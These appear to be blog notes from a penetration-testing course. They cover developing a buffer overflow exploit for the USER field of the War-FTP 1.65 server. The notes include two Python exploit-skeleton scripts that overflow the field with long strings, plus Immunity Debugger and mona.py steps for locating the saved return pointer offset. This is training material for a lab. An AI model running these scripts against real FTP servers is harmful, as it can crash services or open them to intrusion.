Advanced Exploitation: Part 2

Course:  Georgia Weidman on “Advanced Penetration Testing” at Cybrary

*Give the program too much input in the username (USER) field
*Saved return pointer will be overwritten with our attack controlled input

I. Exploit Skeleton -> War-FTP 1.65 USER Buffer Overflow

#!/usr/bin/python
import socket
buffer = “A” * 1100
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((‘192.168.5.44’,21))*
response = s.recv(1024)
print response
s.send(‘USER ‘ + buffer + ‘\r\n’)
response = s.recv(1024)
print response
s.send(‘PASS PASSWORD\r\n’)
s.close()

II. Immunity Debugger -> Attach to the Process

III. Mona.py
A exploit development plugin for Immunity Debugger and WinDGB by the Corelan Team.

Setup logging:!mona config -set workingfolder C:\logs\%p

Identifying the Overwrite​
!mona pattern_create 1100

IV. Mona Findmsp
Use !mona findmsp to find all instances of part or all of the cyclic pattern in memory

Finds if the pattern is in the registers (i.e. EIP) and the offset from the beginning of the pattern​

Verifying Offsets
#!/usr/bin/python
import socket
buffer = “A” * 485 + “B” * 4 + “C” * 611
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((‘192.168.20.10’,21))
response = s.recv(1024)
print response
s.send(‘USER ‘ + buffer + ‘\r\n’)
response = s.recv(1024)
print response
s.send(‘PASS PASSWORD\r\n’)
s.close()

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

%d bloggers like this: